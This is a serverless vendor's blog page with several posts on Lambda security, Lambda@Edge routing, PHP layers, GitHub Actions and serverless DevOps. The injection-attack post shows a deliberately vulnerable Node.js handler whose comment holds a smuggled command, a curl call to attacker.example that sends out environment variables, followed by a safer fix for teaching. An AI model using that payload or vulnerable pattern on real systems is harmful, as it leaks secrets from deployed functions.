Stacks on Stacks

The Serverless Ecosystem Blog by Stackery.

Posts on DevOps

Injection Attacks: Protecting Your Serverless Functions
Garrett Gillas | February 28, 2019

Security is Less of a Problem with Serverless but Still Critical

While trying to verify the claims made on a somewhat facile rundown of serverless security threats, I ran across Jeremy Daly’s excellent writeup of a single vulnerability type in serverless, itself inspired by a fantastic talk from Ory Segal on vulnerabilities in serverless apps. At first I wanted to describe how injection attacks can happen. But the fact is, the two resources I just shared serve as amazing documentation; Ory found examples of these vulnerabilities in active GitHub repos! Instead, it makes more sense to recap their great work before diving into some of the ways that teams can protect themselves.

A Recap on Injection Vulnerability

It might seem like a serverless function just isn’t vulnerable to code injection. After all, it’s just a few lines of code. How much information could you steal from it? How much damage could you possibly do?

The reality is, despite Lambdas running on a highly managed OS layer, that layer still exists and can be manipulated. To put it another way, to be comprehensible and usable to developers of existing web apps, Lambdas need to have the normal abilities of a program running on an OS. Lambdas need to be able to send HTTP requests to arbitrary URLs, so a successful attack will be able to do the same. Lambdas need to be able to load their environment variables, so successful attacks can send all the variables on the stack to an arbitrary URL!

The attack is straightforward enough: a user-submitted file name contains a string that escapes the expected value and appends a shell command. The careless developer parses the file with a terminal command, so the injected command gets run as well.
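
To make the pattern concrete, here's a minimal Node.js sketch of the same mistake and one way to close it. The event shape and the use of the file command are hypothetical placeholders, not taken from Ory's findings:

'use strict'

const { execSync, execFileSync } = require('child_process')

// Hypothetical vulnerable handler: a user-supplied file name flows straight into a shell command.
exports.vulnerableHandler = async (event) => {
  const fileName = event.fileName // e.g. 'photo.jpg; curl https://attacker.example -d "$(env)"'
  // The whole string is handed to a shell, so the injected command runs with the
  // function's permissions and can read its environment variables.
  return execSync(`file ${fileName}`).toString()
}

// A safer version: reject anything that isn't a plain file name, and skip the shell
// entirely by passing the value as a single argument.
exports.saferHandler = async (event) => {
  const fileName = event.fileName
  if (!/^[\w.-]+$/.test(fileName)) throw new Error('Invalid file name')
  return execFileSync('file', [fileName]).toString()
}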

What are the principles at work here?

It’s simple enough to say ‘sanitize your inputs,’ but some of the factors involved here are a bit more complicated than that:

  • Lambdas, no matter how small and simple, can leak useful information
  • There are many sources of events, and almost all of them could include user input
  • With interdependence between serverless resources, user input can come from unexpected angles
  • With so many sources of events, event data, and names, incoming information can arrive in many formats

In case this should seem like a largely theoretical problem, note that Ory’s presentation used examples found in the wild on GitHub.

Solution 1: Secure Your Functions

On Amazon Web Services (AWS), serverless functions are created with no special abilities within your other AWS resources. You need to give them permissions and connect them up to events from various sources. If your Lambdas need storage, it can be tempting to give them permissions to access your S3 buckets.

In the example policy from AWS, the permissions cover only the two buckets we need for read/write access. This is good!

If you’re using Lambdas in diverse roles, this means not using a single IAM policy for all of them. It’s possible to generalize somewhat and re-use policies, but that takes some monitoring of its own.

How Stackery Can Help

The creation and monitoring of multiple IAM roles for a single stack can get pretty arduous when done manually. I like writing JSON as much as the next person, but multiple permissions can also get tough to manage.

With Stackery, giving functions permissions to access a single bucket or database is as easy as drawing a line.

Even better, the Stackery dashboard makes it easy to see what permissions exist between your resources.

How Twistlock Can Help

Keeping a close eye on your permissions is a great general guideline, but we have to be realistic: dynamic teams need to make large, fast changes to their stack, and mistakes are going to happen. Without some kind of warning that our usual policies have been violated, there’s a good chance that vulnerabilities will go out to production.

Twistlock lets you set overall policies either in sections or system-wide for where traffic should be allowed. It can generate warnings when policies are violated or even block traffic, for example between a lambda that serves public information and a database with Personally Identifiable Information (PII).

Twistlock can also scan memory for suspect strings, meaning that, without any special engineering effort, it can detect when a key is being passed around when it shouldn’t be.

Further Reading

Ory Segal has a blog post on testing for SQL injection in Lambdas using open source tools. Even if you’re not going to roll your own security, it’s a great tour of the nature of the attacks that are possible.

Stackery and Twistlock work great together; in fact, we wrote up a solution brief about it. Serverless architecture is rapidly becoming the best way to roll out powerful, secure applications. Get the full guide here.




Lambda@Edge: Why Less is More
Nuatu Tseggai | February 21, 2019

Lambda@Edge is a compute service that allows you to write JavaScript code that executes in any of the 150+ AWS edge locations making up the Amazon CloudFront content delivery network (CDN) service.

In this post, I’ll provide some background on CDN technologies. I will also build out an application stack that serves country-specific content depending on where the user request originates from. The stack utilizes a Lambda@Edge function which checks the country code of an HTTP request and modifies the URI to point to a different index.html object within an S3 bucket.

TL;DR: Less time, fewer resources, less effort

  • CDNs are ubiquitous. Modern websites and applications make extensive use of CDN technologies to increase speed and reliability.
  • Lambda@Edge has some design limitations: Node.js only, must be deployed through us-east-1, memory-size limits differ between event types, etc.

Read on for a working example alongside tips and outside resources to inform you of key design considerations as you evaluate Lambda@Edge.

The best of both worlds: Lambda + CloudFront

  • Fully managed: no servers to manage and you never have to pay for idle
  • Reliable: built-in availability and fault-tolerance
  • Low latency: a global network of 160+ Points of Presence in 65 cities across 29 countries (as of early 2019)

A Use Case

You have a website accessed by users from around the world. For users in the United States, you want CloudFront to serve a website with US market-specific information. The same is true for users in Australia, Brazil, Europe, or Singapore and each of their respective markets. For users in any country besides those mentioned above, you want CloudFront to serve a default website.

Stackery will be used to design, deploy, and operate this stack; but the Infrastructure as Code and Lambda@Edge concepts are valid with or without Stackery.

Check out this link to explore many of the other use cases such as:

  • A/B testing
  • User authentication and authorization
  • User prioritization
  • User tracking and analytics
  • Website security and privacy
  • Dynamic web application at the edge
  • Search engine optimization (SEO)
  • Intelligently route across origins and data centers
  • Bot mitigation at the edge
  • Improved user experience (via personalized content)
  • Real-time image transformation

Background: Need for Speed

Traffic on the modern Internet has been growing at a breakneck rate over the last two decades. This growth is being fueled by nearly 4 billion humans with an Internet connection. It’s estimated that more than half of the world’s traffic now comes from mobile phones and that video streaming accounts for 57.69% of global online data traffic. Netflix alone is responsible for 14.97% of the total downstream volume of traffic across the entire internet! The rest comes from web browsing, gaming, file sharing, connected devices (cars, watches, speakers, TVs), industrial IoT, and back-end service-to-service communications.

To keep pace with this rate of growth, website owners and Internet providers have turned to CDN technologies to cache web content on geographically dispersed servers at edge locations around the world. Generally speaking, these CDNs serve HTTP requests by accepting the connection at an edge location in close proximity to the user (latency-wise), organizing the request into phases, and caching the response content so that the aggregate user experience is fast, secure, and reliable.

When done correctly, the result is a win-win: the end user gets faster load times, and there is a lighter load on both the origin server and the backhaul portion of the major telecommunications networks (i.e., the intermediate links between the core network, backbone network, and subnetworks at the edge of the network).

For more background, check out the What is a CDN page from CloudFlare and this Amazon CloudFront Key Features page from AWS.

Lambda@Edge

Lambda@Edge is a relatively new feature (circa 2017) of CloudFront which enables the triggering of Lambda functions by any of the following four CDN events.

Viewer Request

Edge Function is invoked when the CDN receives a request from an end user. This occurs before the CDN checks if the requested data is in its cache.

Origin Request

Edge Function is invoked only when the CDN forwards a request to your origin. If the requested data is in the CDN cache, the Edge Function assigned to this event does not execute.

Origin Response

Edge Function is invoked when the CDN receives a response from your origin. This occurs before the CDN caches the origin’s response data. An Edge Function assigned to this event is triggered even if the origin returns an error.

Viewer Response

Edge Function is invoked when the CDN returns the requested data to the end user. An Edge Function assigned to this event is triggered regardless of whether the data is already present in the CDN’s cache.

When deciding which CDN event should trigger your Edge Function, consider these questions from the AWS Developer Guide, as well as additional clarifying questions from this helpful AWS blog post in the “Choose the Right Trigger” section.

Sample Source

The source code for this project is available from my GitHub.

Template Generation

I used the Stackery editor to lay out the components and generate a template:

The template is available in the Git repo as template.yaml.

This application stack is pretty straightforward: a CDN is configured to serve a default index.html from an S3 bucket, and the CDN is also configured to trigger a Lambda@Edge function upon any Origin Request events. Origin Requests are only made when there is a cache miss, but in the context of this application stack, cache misses will be rare. The default TTL for files in CloudFront is 24 hours; depending on your needs, you can reduce the duration to serve dynamic content or increase it to get better performance. The latter also lowers the cost, because your file is more likely to be served from an edge cache, reducing load on your origin.

Pay special attention to lines 11-12 within the infrastructure as code template. These lines configure the CDN to cache based on the CloudFront-Viewer-Country header which is added by CloudFront after the viewer request event.

Also note line 23, which specifies “Price Class 200” for the CDN, enabling content to be delivered from all AWS edge locations except those in South America. Price Class All is the most expensive and enables content to be delivered from all AWS edge locations (this is the default if no other price class is specified). Price Class 100 is the cheapest and only delivers content from the United States, Canada, and Europe. For more information on pricing, check out this link.

Lambda@Edge Function

The Lambda@Edge function checks whether the country code of the request is AU, BR, EU, SG, or US. If it is, the URI of the HTTP request is modified to point to a country-specific index.html object (such as au/index.html or us/index.html) within the S3 bucket. The default index.html object is served from the S3 bucket if the country code is NOT one of the above five.

Here’s the complete function code: index.js

'use strict'

exports.handler = async (event) => {
    const request = event.Records[0].cf.request
    const headers = request.headers

    console.log(JSON.stringify(request))
    console.log(JSON.stringify(request.uri))

    const auPath = '/au'
    const brPath = '/br'
    const euPath = '/eu'
    const sgPath = '/sg'
    const usPath = '/us'

    // CloudFront adds this header after the viewer request event; use it to
    // prefix the URI with the matching market-specific path.
    if (headers['cloudfront-viewer-country']) {
        const countryCode = headers['cloudfront-viewer-country'][0].value
        if (countryCode === 'AU') {
          request.uri = auPath + request.uri
        } else if (countryCode === 'BR') {
          request.uri = brPath + request.uri
        } else if (countryCode === 'EU') {
          request.uri = euPath + request.uri
        } else if (countryCode === 'SG') {
          request.uri = sgPath + request.uri
        } else if (countryCode === 'US') {
          request.uri = usPath + request.uri
        }
    }
    console.log(`Request uri set to "${request.uri}"`)

    return request
}

Deployment

Of course, Stackery makes it simple to deploy this application into AWS, but it should be pretty easy to give the template directly to CloudFormation. You may want to go through and whack the parameters like ‘StackTagName’ that are added by the Stackery runtime.

Once the deployment is complete, the provisioned CDN distribution will have a DNS address. I deployed this application to several different environments, one of which I have defined as staging. Here’s the DNS address of that distribution: https://d315q2a48nys0i.cloudfront.net/

Lastly, go to the newly created S3 bucket and add this default index.html file to the root of the bucket. Then create the following 5 “folders” in the S3 bucket: au, br, eu, sg, us. I put folders in quotes because S3 doesn’t technically have folders, but the UI refers to them as folders and allows them to be created as such. Once each folder is created, add the respective index.html that I have saved in the /html directory within this GitHub project (i.e., for the au folder, copy over the index.html that I have saved at /html/au/index.html). The AWS CLI is convenient for this type of copying/syncing; check out this link for tips on managing S3 buckets and objects from the command line.

If I hit the DNS address of the CDN distribution from Portland, Oregon, I see the following:

See How it Appears to the Rest of the World

GeoPeeker is a pretty nifty tool that allows you to see how a site appears to the rest of the world. Just go to this link and GeoPeeker will show the site I’ve deployed as it appears to users in Singapore, Brazil, Virginia, California, Ireland, and Australia.

Conclusion

I encourage you to explore the shape of the request event object as well as the response event object, both of which can be found at this link. At one point prior to finding this page, I was getting my wires crossed in terms of the values available on each object. Once I found it, I was able to instantly get back on track and home in on the URI value that I wanted to modify.
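
For orientation, the origin request event that this function receives looks roughly like the following. It's trimmed to the fields used here and the values are examples, so treat it as an approximation rather than the authoritative schema:

// Approximate shape of an origin request event, trimmed to the interesting fields
const exampleEvent = {
  Records: [{
    cf: {
      config: { distributionId: 'EDFDVBD6EXAMPLE', eventType: 'origin-request' },
      request: {
        method: 'GET',
        uri: '/index.html',
        querystring: '',
        headers: {
          'cloudfront-viewer-country': [{ key: 'CloudFront-Viewer-Country', value: 'US' }]
        },
        origin: {
          s3: { domainName: 'my-bucket.s3.amazonaws.com', path: '', customHeaders: {} }
        }
      }
    }
  }]
}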

An alternative implementation to changing the URI is to change the host. In that scenario, I could have created a separate S3 bucket for the default site and separate S3 buckets holding the index.html for each of the 5 countries, then, upon each Origin Request, modified the host instead of the URI when I found a match. Perhaps I’ll do that in a follow-on post to show the difference in the resulting Infrastructure as Code template and Lambda@Edge function.
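
As a rough sketch of that variant (the bucket domain names below are hypothetical), the origin request handler would swap the S3 origin and keep the Host header in sync instead of rewriting the URI:

'use strict'

// Hypothetical sketch of the host-swapping variant: route matched countries to
// their own S3 bucket origins instead of rewriting the URI.
exports.handler = async (event) => {
  const request = event.Records[0].cf.request
  const headers = request.headers

  const bucketsByCountry = {
    AU: 'my-site-au.s3.amazonaws.com',
    BR: 'my-site-br.s3.amazonaws.com',
    EU: 'my-site-eu.s3.amazonaws.com',
    SG: 'my-site-sg.s3.amazonaws.com',
    US: 'my-site-us.s3.amazonaws.com'
  }

  if (headers['cloudfront-viewer-country']) {
    const countryCode = headers['cloudfront-viewer-country'][0].value
    const domainName = bucketsByCountry[countryCode]
    if (domainName) {
      // Point the origin at the country-specific bucket and keep the Host header in sync.
      request.origin.s3.domainName = domainName
      headers['host'] = [{ key: 'Host', value: domainName }]
    }
  }

  return request
}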

The use case I covered is relatively approachable. More advanced use cases, such as securing sites and applications from bots or DDoS attacks, would be really interesting and fun to implement using Lambda@Edge. It would be great to see more blog posts and/or reference implementations based on reproducible Infrastructure as Code samples that show Lambda@Edge-based solutions targeting A/B testing, analytics, and user authentication and authorization. Let me know on Twitter or in the comments which types of use cases you’re interested in, and I’ll work to put them together or coordinate with various serverless experts to bring the solutions to life.

PHP on Lambda? Layers Makes it Possible!
Nuatu Tseggai | November 29, 2018

AWS’s announcement of Lambda Layers means big things for those of us using serverless in production. Being able to create shared components that can be included with any number of Lambdas means you no longer have to zip up your application code and all of its dependencies each time you deploy a serverless stack. It also allows you to include dependencies that are much more bespoke to your particular serverless environment.

In order to enable Stackery customers with Layers at launch, we took a look at Lambda Layers use cases. I also decided to go a bit further and publish a layer that enables you to write a Lambda in PHP. Keep in mind that this is an early iteration of the PHP runtime Layer, which is not yet ready for production. Feel free to use this Layer to learn about the new Lambda Layers feature and begin experimenting with PHP functions and send us any feedback; we expect this will evolve as the activity around proof of concepts expands.

What does PHP do?

PHP is a general-purpose computing language, and you could use it to emulate the event-processing syntax of a typical Lambda. But really, PHP is used to create websites, so Chase’s implementation maintains that model: your Lambda accepts API Gateway events and processes them through a PHP web server.

How do you use it?

Configure your function as follows:

  1. Set the Runtime to provided
  2. Determine the latest version of the layer: aws lambda list-layer-versions --layer-name arn:aws:lambda:<your region>:887080169480:layer:php71
  3. Add the following Lambda Layer: arn:aws:lambda:<your region>:887080169480:layer:php71:<latest version>

If you are using AWS SAM it’s even easier! Update your function:

Resources:
  MyFunction:
    Type: AWS::Serverless::Function
    Properties:
      ...
      Runtime: provided
      Layers:
        - !Sub arn:aws:lambda:${AWS::Region}:887080169480:layer:php71:<latest version>

Now let’s write some Lambda code!

<?php
header('Foo: bar');
print('Request Headers:');
print_r(getallheaders());
print('Query String Params:');
print_r($_GET);
?>

Hi!

The response you get from this code isn’t very well formatted, but it does contain the header information passed by the API gateway:

If you try any path other than the one with a configured API endpoint response, you’ll get an error response that the sharp-eyed will recognize as coming from the PHP web server, which, as mentioned above, is processing all requests.

Implementation Details

Layers can be shared between AWS accounts, which is why the instructions above for adding a layer work: you don’t have to create a new layer for each Lambda. Some key points to remember:

  • A layer must be published in your region
  • You must specify the version number for a layer
  • For the layer publisher, a version number is an integer that increments each time you deploy your layer

How Stackery Makes an Easy Process Easier

Stackery can improve every part of the serverless deployment process, and Lambda Layers are no exception. Stackery makes it easy to configure components like your API gateway.

Stackery also has integrated features in the Stackery Operations Console, which lets you add layers to your Lambda:

Conclusions

Lambda Layers offer the potential for more complex serverless applications that make use of a deep library of components, both internal to your team and shared. Try adding some data variables or a few npm modules as a layer today!

GitHub Actions: Automating Serverless Deployments
Toby Fee | November 20, 2018

The whole internet is abuzz over GitHub Actions, if by ‘whole internet’ you mean ‘the part of the internet that is obsessed with serverless ops’ and by ‘abuzz’ you mean ‘aware of’.

But Actions are a bit surprising! GitHub is a company that has famously focused on doing a single thing extremely well. As the ranks of developer-tooling SaaS companies swell by the day, you would think GitHub would have long ago joined the fray. Wouldn’t you like to try out a browser-based IDE, CI/CD tools, or live debugging tools, with the GitHub logo at the top left corner?

With the GitHub Actions product page promising to let you build your own ‘workflow’ from private and shared ‘actions’ in any order you want, with each action run in its own Docker container and the whole thing configured with a simple-but-powerful scripting logic, GitHub Actions feels like a big, ambitious expansion of the product. Could this be the influence of notoriously over-ambitious new leadership at Microsoft?

In reality GitHub Actions are a powerful new tool for expanding what you do based on GitHub events and nothing else!

What can it do?

A lot! Again, all in the realm of ‘doing something to your repo when something happens to your repo.’ Some use cases that stand out:

  • Build your assets when you commit to Master
  • Raise alerts for critical issues
  • Take some custom action when commits get comments
  • Notify stakeholders when feature branches are merged to production

What can’t it do?

A whole lot! Workflows can’t:

  • Respond to anything other than GitHub repo events (you can’t send a request from anywhere else to kick off a workflow)
  • Take more than an hour
  • Have more than 100 actions - a limitation that seems pretty minor since actions can do arbitrarily large tasks

Overall Impressions

GitHub Actions are definitely a step in the right direction, since both the configuration for a workflow and the Docker images for each action can all be part of a single repo, managed like your other code. And as I and others have often harped on: one should always prefer managing code over managing config. GitHub Actions increase the likelihood that your whole team will be able to see how the workflow around your code is supposed to work, and that’s an unalloyed benefit to your team.

“I’m sold, GitHub Actions forever! I’ll add them to master tomorrow.”

Bad news, sport: GitHub Actions are in beta with a waitlist, and while GitHub has its sights set on integrating Actions with your production process, a warning at the top of the developer guide explicitly states that GitHub Actions isn’t ready to do that.

So for now head on over and get on the waiting list for the feature, and try it out with your dev branches sometime soon.

GitHub makes no secret of the fact that Actions replace the task of building an app to receive webhooks from your repository. If you’d like to build an app in the simplest possible structure, my coworker Anna Spysz wrote about how to receive GitHub webhooks in just a few steps. Further, using Stackery makes it easy to hook your app up to a docker container to run your build tasks.

The Case for Minimalist Infrastructure
Garrett Gillas | November 13, 2018

If your company could grow its engineering organization by 40% without increasing costs, would they do it? If your DevOps team could ship more code and features with fewer people, would they want to? Hopefully, the answer to both of these questions is ‘yes’. At Stackery, we believe in helping people create the most minimal application infrastructure possible.

Let me give you some personal context. Last year, I was in charge of building a web application integrated with a CMS that required seven virtual machines, three MongoDBs, a MySQL database and CDN caching for production. In addition, we had staging and dev environments with similar quantities of infrastructure. Over the course of 2 weeks, we were able to work with our IT-Ops team to get our environments up and running and start building the application relatively painlessly.


After we got our application running, something happened. Our IT-Ops team went through their system hardening procedure. For those outside the cybersecurity industry, system hardening can be defined as “securing a system by reducing its surface of vulnerability”. This often includes things like changing default passwords, removing unnecessary software, unnecessary logins, and the disabling or removal of unnecessary services. This sounds fairly straightforward, but it isn’t.

In our case, it involved checking our system against a set of rules like this one for Windows VMs and this one for Linux. Because we cared about security, this included closing every single port on every single appliance that was not in use. As the project lead, I discovered three things by the end.

  • We had spent much more people-hours on security and ops than on development.
  • Because there were no major missteps, this was nobody’s fault.
  • This should never happen.

Every engineering manager should have a ratio in their head of work hours spent in their organization on software engineering vs other related tasks (ops, QA, product management, etc…). The idea is that organizations that spend the majority of their time actually shipping code will perform better than groups that spend a larger percentage of their time on operations. At this point, I was convinced that there had to be a better way.

Serverless Computing

There have been many attempts since the exodus to the cloud to make infrastructure easier to manage in a way that requires fewer personnel hours. We moved from bare-metal hardware to datacenter VMs, then to VMs in the cloud, and later to containers.

In November 2014 Amazon Web Services announced AWS Lambda. The purpose of Lambda was to simplify building on-demand applications that are responsive to events and data. At Stackery, we saw a big opportunity that allows software teams to spend less time on infrastructure, and more time building software. We have made it our mission to make it easier for software engineers to build highly-scalable applications on the most minimal, modern cloud infrastructure available.

Five Ways Serverless Changes DevOps
Sam Goldstein | October 31, 2018

I spent last week at DevOps Enterprise Summit in Las Vegas, where I had the opportunity to talk with many people from the world’s largest companies about DevOps, serverless, and the ways they are delivering software faster with better stability. We were encouraged to hear of teams using serverless for everything from cron jobs to core bets on accelerating digital transformation initiatives.

Lots of folks had questions about what we’ve learned running the serverless engineering team at Stackery, how to ensure innovative serverless projects can coexist with enterprise standards, and most frequently, how serverless changes DevOps workflows. Since I now have experience building developer enablement software out of virtual machines, container infrastructures, and serverless services I thought I’d share some of the key differences with you in this post.

Developers Need Cloud-Side Environments to Work Effectively

At its core, serverless development is all about combining managed services in the cloud to create applications and microservices. The serverless approach has major benefits. You can move incredibly fast, outsourcing tons of infrastructure friction and orchestration complexity.

However, because your app consists of managed services, you can’t run it on your laptop. You can’t run the cloud on your laptop.

Let’s pause here to consider the implications of this. With VMs and containers, deploying to the cloud is part of the release process. New features get developed locally on laptops and deployed when they’re ready. With serverless, deploying to the cloud becomes part of the development process. Engineers need to deploy as part of their daily workflow developing and testing functionality. Automated testing generally needs to happen against a deployed environment, where the managed service integrations can be fully exercised and validated.

This means the environment management needs of a serverless team shift significantly. You need to get good at managing a multitude of AWS accounts, developer-specific environments, avoiding namespace collisions, injecting environment-specific configuration, and promoting code versions from cloud-side development environments toward production.
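
One common pattern, sketched below with hypothetical variable and table names rather than any particular tool's convention, is to have the deployment pipeline inject an environment name and environment-scoped resource names as Lambda environment variables, so the same function code promotes cleanly from developer environments toward production:

'use strict'

// Minimal sketch: environment-specific configuration arrives via environment variables
// set at deploy time, so the code itself contains no environment-specific values.
// ENVIRONMENT_NAME and ORDERS_TABLE are placeholder names, not a required convention.
const AWS = require('aws-sdk')
const dynamo = new AWS.DynamoDB.DocumentClient()

const ENVIRONMENT = process.env.ENVIRONMENT_NAME // e.g. 'dev-sam', 'test', 'prod'
const ORDERS_TABLE = process.env.ORDERS_TABLE    // e.g. 'orders-dev-sam', avoiding namespace collisions

exports.handler = async (event) => {
  console.log(`Handling order in environment ${ENVIRONMENT}`)
  await dynamo.put({ TableName: ORDERS_TABLE, Item: { id: event.id, body: event.body } }).promise()
  return { statusCode: 200 }
}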

Note: While there are tools like SAM CLI and localstack that enable developers to invoke functions and mimic some managed services locally, they tend to have gaps and behave differently than a cloud-side environment.

Infrastructure Management = Configuration Management

The serverless approach focuses on leveraging the cloud provider to do more of the undifferentiated heavy lifting of scaling the IT infrastructure, freeing your team to maintain laser focus on the unique problems your organization solves.

To repeat what I wrote a few paragraphs ago, serverless teams build applications by combining managed services that have the most desirable scaling, cost, and durability characteristics. However, here’s another big shift. Developers now need familiarity with a hefty catalog of services. They need to understand their pros and cons, when to use each service, and how to configure each service correctly.

A big part of solving this problem is to leverage Infrastructure as Code (IaC) to define your serverless infrastructure. For serverless teams this commonly takes the form of an AWS Serverless Application Model (SAM) template, a serverless.yml, or a CloudFormation template. Infrastructure as Code provides the mechanism to declare the configuration and relationships between the managed services that compose your serverless app. However, because serverless apps typically involve coordinating many small components (Lambda functions, IAM permissions, API & GraphQL gateways, datastores, etc.), the YAML files containing the IaC definition tend to balloon to hundreds (or sometimes thousands) of lines, making them tedious to modify and hard to keep consistent with good hygiene. Multiply the size and complexity of a microservice IaC template by your dev, test, and prod environments, the engineers on the team, and the number of microservices, and you quickly get to a place where you will want to carefully consider how you’ll manage the IaC layer and avoid being sucked into YAML hell.

Microservice Strategies Are Similar But Deliver Faster

Serverless is now an option for both new applications and refactoring monoliths into microservices. We’ve seen teams deliver highly scalable, fault-tolerant services in days instead of months to replace functionality in monoliths and legacy systems. We recently saw a team employ the serverless strangler pattern to transition a monolith to GraphQL serverless microservices, delivering a production ready proof of concept in just under a week. We’ve written about the Serverless Strangler Pattern before on the Stackery blog, and I’d highly recommend you consider this approach to technical transformation.

A key difference with serverless is the potential to eliminate infrastructure and platform provisioning cycles completely from the project timeline. By choosing managed services, you’re intentionally limiting yourself to a menu of services with built-in orchestration, fault tolerance, scalability, and defined security models. Building scalable distributed systems is now focused exclusively on the configuration management of your infrastructure as code (see above). Just whisper the magic incantation (in 500-1000 lines of YAML) and microservices spring to life, configured to scale on demand, rather than being brought online through cycles of infrastructure provisioning.

Regardless of platform, enforcing cross-cutting operational concerns when the number of services increases is a (frequently underestimated) challenge. With microservices it’s easy to keep the pieces of your system simple, but it’s hard to keep them all consistent as the number of pieces grows.

What cross-cutting concerns need to be kept in sync? It’s things like:

  • access control
  • secrets management
  • environment configuration
  • deployment
  • rollback
  • auditability
  • so many other things…

Addressing cross-cutting concerns is an area where many serverless teams struggle, sometimes getting bogged down in a web of inconsistent tooling, processes, and visibility. However, the serverless teams that do master cross-cutting concerns are able to deliver on microservice transformation initiatives much faster than those using other technologies.

Serverless is Innovating Quickly

Just like serverless teams, the serverless ecosystem is moving fast. Cloud providers are pushing out new services and features every day. Serverless patterns and best practices are undergoing rapid, iterative evolution. There are multiple AWS product and feature announcements every day. It’s challenging to stay current on the ever expanding menu of cloud managed services, let alone best practices.

Our team at Stackery is obsessed with tracking changes in the serverless ecosystem, identifying best practices, and sharing these with the serverless community. AWS Secrets Manager, easy authorization hooks for REST APIs in AWS SAM, 15 minute Lambda timeouts, and AWS Fargate Containers are just a few examples of recent serverless ecosystem changes our team is using. Only a serverless team can keep up with a serverless team. We have learned a lot of lessons, some of them the hard way, about how to do serverless right. We’ll keep refining our serverless approach and can honestly say we’re moving faster and with more focus than we’d ever thought possible.

Patching and Capacity Distractions Go Away (Mostly)

Raise your hand if the productivity of your team ever ground to a halt because you needed to fight fires or were blocked waiting for infrastructure to be provisioned. High profile security vulnerabilities are being discovered all the time. The week Heartbleed was announced a lot of engineers dropped what they had been working on to patch operating systems and reboot servers. Serverless teams intentionally don’t manage OS’s. There’s less surface area for them to patch, and as a result they’re less likely to get distracted by freshly discovered vulnerabilities. This doesn’t completely remove a serverless team’s need to track vulnerabilities in their dependencies, but it does significantly scope them down.

Capacity constraints are a similar story. Since serverless systems scale on demand, it’s not necessary to plan capacity in the traditional sense, managing a buffer of (often slow to provision) capacity to avoid hitting a ceiling in production. However, serverless teams do need to watch a wide variety of AWS resource limits and request increases before they are hit. It is important to understand how your architecture scales and how that will affect your infrastructure costs. Instead of your system breaking, it might just send you a larger bill, so understanding the relationship between scale, reliability, and cost is critical.

As a community we need to keep pushing the serverless envelope and guiding more teams in the techniques to break out of technical debt, overcome infrastructure inertia, embrace a serverless mindset, and start showing results they never knew they could achieve.

The '8 Fallacies of Distributed Computing' Aren't Fallacies Anymore
Apurva Jantrania | October 23, 2018

In the mid-’90s, centralized ‘mainframe’ systems were in direct competition with microcomputing for dominance of the technology marketplace and developers’ time. Peter Deutsch, a Sun Microsystems engineer who was a ‘thought leader’ before we had the term, wrote down seven fallacious assumptions that many developers made about distributed computing, to which James Gosling added one more to make the famous list of The 8 Fallacies of Distributed Computing.

  1. The network is reliable
  2. Latency is zero
  3. Bandwidth is infinite
  4. The network is secure
  5. Topology doesn’t change
  6. There is one administrator
  7. Transport cost is zero
  8. The network is homogeneous

Microcomputing would win that debate in the 90’s, with development shifting to languages and platforms that could be run on a single desktop machine. Twenty years later we’re still seeing these arguments used against distributed computing, especially against the most rarefied version of distributed computing, serverless. Recently, more than one person has replied to these fallacies by saying they ‘no longer apply’ or ‘aren’t as critical’ as they once were, but the truth is none of these are fallacies any more.

How can these fallacies be true? There’s still latency and network vulnerabilities.

Before about 2000, the implied comparison with local computing didn’t need to be stated: “The network is more reliable than your local machine…” was obviously a fallacy. But now that assumption is the one under examination. Networks still have latency, but the superiority of local machines over networks is now either in doubt or absent.

1. The Network is Reliable

This is a pretty good example of how the list of fallacies ‘begs the question.’ What qualifies as ‘reliable?’ Now that we have realistic stats about hard drive failure rates, even a RAID-compliant local cluster has some failure rate.

2. Latency is Zero

Latency is how much time it takes for data to move from one place to another (versus bandwidth, which is how much data can be transferred during that time). The reference here is to mainframe ‘thin client’ systems where every few keystrokes had to round-trip to a server over an unreliable, laggy network.

While our networking technology is a lot better, another major change has been effective AJAX and async tools that check in when needed and show responsive interfaces all the time. On top of a network request structure that hasn’t been much updated since the ’90s, and a browser whose memory needs seem to double annually, we still manage to run cloud IDEs that perform pretty well.

3. Bandwidth is Infinite

Bandwidth still costs something, but beyond the network improvements mentioned above, the cost of bandwidth has become extremely tiny. Bills for bandwidth do exist, and I’ve even seen some teams optimize to try to save on their bandwidth costs!

In general, this costs way more in developer wages than it saves, which brings us to the key point. Bandwidth still costs money, but the limited resource is not technology but people. You can buy a better network connection at 2 AM on a Saturday, but you cannot hire a SQL expert who can halve your number of DB queries.

4. The Network is Secure

As Bloomberg struggles to back up its reports of a massive hardware bugging attack against server hardware, many people want to return to a time when networks were inherently untrustworthy. More accurately, since few developers can do their jobs without constant network access for at least GitHub and npm, untrustworthy networks are an easy scapegoat for the poor operational security practices that almost everyone commits.

The Dimmie attack, which peaked in 2017, targeted the actual spot where most developers are vulnerable: their laptops. With enough access to load in-memory modules on your home machine, attackers can corrupt your code repos with malicious content. In a well-run dev shop, it’s the private computing resources that tend to be entry points for malicious attacks; the laptops that we take home with us for personal use should be the least trustworthy component.

5. Topology Doesn’t Change

With the virtualization options available in something serverless like AWS’s Relational Database Service (RDS), it’s likely that topology never has to change from the point of view of the client. On a local or highly controlled environment there are setups where no DB architectures, interfaces, or request structures have changed in years. This is called ‘Massive Tech Debt’.

6. There is One Administrator

If this isn’t totally irrelevant (no one works on code that has a single human trust source anymore, and if they do, that’s… real bad; get a second GitHub admin, please), it might still be a reason to use serverless and not roll your own network config.

For people just dipping a toe into managed services, there are still horror stories about the one single AWS admin leaving for six weeks of vacation, deciding to join a monastery, and leaving the dev team unable to make changes. In those situations where there wasn’t much consideration of the ‘bus factor’ on your team, there still is just one administrator: the service provider. And as long as you’re the one paying for the service, you can wrest back control.

7. Transport Cost is Zero

Yes, transport cost is zero. This one is just out of date.

8. The Network is Homogeneous

Early networked systems had real issues with this. I am reminded of the college that reported it could only send emails to places within 500 miles; there are ‘special places’ in a network that can confound your tests and your general understanding of the network.

This fallacy isn’t so much true as defused: the awkward parts of a network are now clearly labelled as such. CI/CD explicitly tests in a controlled environment, and even AWS, which does its darndest to present you with a smooth, homogeneous system, intentionally makes you aware of geographic zones.

Conclusions

We’ve all seen people on Twitter pointing out an AWS outage and shouting about how this means we should ‘not trust someone else’s computer,’ but I’ve never seen an AWS-hosted service have 1/10th the outages of a self-hosted service. Next time someone shares a report of a 2-hour outage in a single Asian AWS region, ask to see their red team logs from the last 6 months.

At Stackery, we have made it our mission to make modern cloud infrastructure as accessible and useful as possible. Get your engineering team the best solution for building, managing and scaling serverless applications with Stackery today.

Disaster Recovery in a Serverless World - Part 3
Nuatu Tseggai | October 18, 2018

